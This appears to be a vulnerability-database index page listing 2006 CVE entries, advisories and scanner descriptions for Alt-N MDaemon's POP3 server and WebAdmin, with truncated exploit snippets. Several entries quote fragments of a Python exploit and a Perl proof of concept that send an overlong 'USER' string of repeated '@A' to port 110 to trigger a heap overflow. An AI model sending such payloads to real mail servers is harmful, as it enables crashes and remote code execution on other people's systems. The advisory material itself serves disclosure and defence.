WebAdmin < 3.2.6 MDaemon Account Hijacking

The remote host is running WebAdmin, a web-based remote administration tool for Alt-N MDaemon. According to its banner, the installed version of WebAdmin enables a domain administrator within the default domain to hijack the 'MDaemon' account used by MDaemon when processing remote server and...

CVE-2006-4364

Multiple heap-based buffer overflows in the POP3 server in Alt-N Technologies MDaemon before 9.0.6 allow remote attackers to cause a denial of service daemon crash and possibly execute arbitrary code via long strings that contain '@' characters in the 1 USER and 2 APOP commands...

mdaemon-user-py.txt

!/usr/bin/python import sys import struct import socket from time import sleep MDaemon Pre Authentication USER Heap Overflow Code based on Leon Juranic's exploit Coded by muts - [email protected] http://www.hackingdefined.com http://www.remote-exploit.org Tested on: Mdaemon 9.0.5 Mdaemon 7.2....

mdaemon_poc.txt

PoC for Mdaemon POP3 preauth heap overflow Coded by Leon Juranic Infigo IS $host = '192.168.0.105'; use IO::Socket; for $x = 0 ; $x $host,PeerPort = '110', Proto = 'tcp' || die "socket error\n\n"; recv $sock, $var, 10000,0; print $var; print $sock "USER " . "@A" x 160 . "\r\n"; recv $sock, $var,...

CVE-2006-4371

Multiple directory traversal vulnerabilities in Alt-N WebAdmin 3.2.3 and 3.2.4 running with MDaemon 9.0.5, and possibly earlier, allow remote authenticated global administrators to read arbitrary files via a .. dot dot in the file parameter to 1 logfileview.wdm and 2 configfileview.wdm...

CVE-2006-4370

Affected software / component: Alt-N WebAdmin (versions 3.2.3–3.2.4 with MDaemon 9.0.5; possibly earlier). Root cause / vulnerability: A flaw in WebAdmin’s handling of authentication/authorization via the userlist.wdm mechanism allows a remote authenticated domain administrator to change a global...

CVE-2006-4371

Multiple directory traversal vulnerabilities in Alt-N WebAdmin 3.2.3 and 3.2.4 running with MDaemon 9.0.5, and possibly earlier, allow remote authenticated global administrators to read arbitrary files via a .. dot dot in the file parameter to 1 logfileview.wdm and 2 configfileview.wdm...

Alt-N MDaemon POP3 Server &lt; 9.06 - &#039;USER&#039; Remote Heap Overflow

!/usr/bin/python import sys import struct import socket from time import sleep MDaemon Pre Authentication USER Heap Overflow Code based on Leon Juranic's exploit Coded by muts - [email protected] http://www.hackingdefined.com http://www.remote-exploit.org Tested on: Mdaemon 9.0.5 Mdaemon 7.2....

Alt-N MDaemon POP3 Server 9.06 - USER Remote Heap Overflow

Alt-N MDaemon POP3 Server 9.06 - USER Remote Heap Overflow !/usr/bin/python import sys import struct import socket from time import sleep MDaemon Pre Authentication USER Heap Overflow Code based on Leon Juranic's exploit Coded by muts - [email protected] http://www.hackingdefined.com...

MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit

Exploit for unknown platform in category remote exploits ============================================================== MDaemon POP3 Server 9.06 USER Remote Heap Overflow Exploit ============================================================== !/usr/bin/python import sys import struct import socket...

CVE-2006-4364

CVE-2006-4364 affects Alt-N Technologies’ MDaemon POP3 server prior to version 9.0.6. The vulnerability is due to multiple heap-based buffer overflows triggered by long strings containing '@' characters in the USER and APOP commands. Exploitation can cause a daemon crash (DoS) and may allow remot...

CVE-2006-4364

Multiple heap-based buffer overflows in the POP3 server in Alt-N Technologies MDaemon before 9.0.6 allow remote attackers to cause a denial of service daemon crash and possibly execute arbitrary code via long strings that contain '@' characters in the 1 USER and 2 APOP commands...

Microsoft Outlook Express 6.00.2800.1409

INFIGO IS Security Advisory ADV-2006-08-04 http://www.infigo.hr/ Title: MDaemon POP3 server remote buffer overflow preauth Advisory ID: INFIGO-2006-08-04 Date: 2006-08-21 Advisory URL: http://www.infigo.hr/en/infocus/advisories/INFIGO-2006-08-04 Impact: Remote code execution preauth Risk Level:...

Alt-N MDaemon POP3 server buffer overflow

Buffer overflow on oversized username with '@' character in USER/APOP command...

TTG0601 - Alt-N WebAdmin Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 TTG0601 - Alt-N WebAdmin Multiple Vulnerabilities RELEASE DATE: August 21st, 2006 VENDOR: Alt-N Technologies http://www.altn.com VULNERABLE: Tested on Alt-N WebAdmin v3.2.3/3.2.4 running with MDaemon v9.0.5, earlier versions are suspected vulnerable a...

MDaemon < 9.0.6 POP3 Server USER / APOP Command Remote Overflow

According to its banner, the POP3 server bundled with the version of MDaemon on the remote host has two buffer overflows that can be triggered with long arguments to the 'USER' and 'APOP' commands. By exploiting these issues, a remote, unauthenticated user can reportedly crash the affected servic...

WebAdmin < 3.2.5 Multiple Vulnerabilities

The remote host is running WebAdmin, a web-based remote administration tool for Alt-N MDaemon. According to its banner, the installed version of WebAdmin fails to properly filter directory traversal sequences from the 'file' parameter of the 'logfileview.wdm' and 'configfileview.wdm' scripts. A...

ALT-N MDaemon POP Server < 9.06 USER / APOP Command Overflow

Binary data 3734.prm...

MDaemon POP3 Server &lt; 9.06 - &#039;USER&#039; Remote Buffer Overflow (PoC)

PoC for Mdaemon POP3 preauth heap overflow Coded by Leon Juranic Infigo IS $host = '192.168.0.105'; use IO::Socket; for $x = 0 ; $x $host,PeerPort = '110', Proto = 'tcp' || die "socket error\n\n"; recv $sock, $var, 10000,0; print $var; print $sock "USER " . "@A" x 160 . "\r\n"; recv $sock, $var,...

MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC

Exploit for unknown platform in category dos / poc ============================================================ MDaemon POP3 Server Infigo IS $host = '192.168.0.105'; use IO::Socket; for $x = 0 ; $x $host,PeerPort = '110', Proto = 'tcp' || die "socket error\n\n"; recv $sock, $var, 10000,0; print...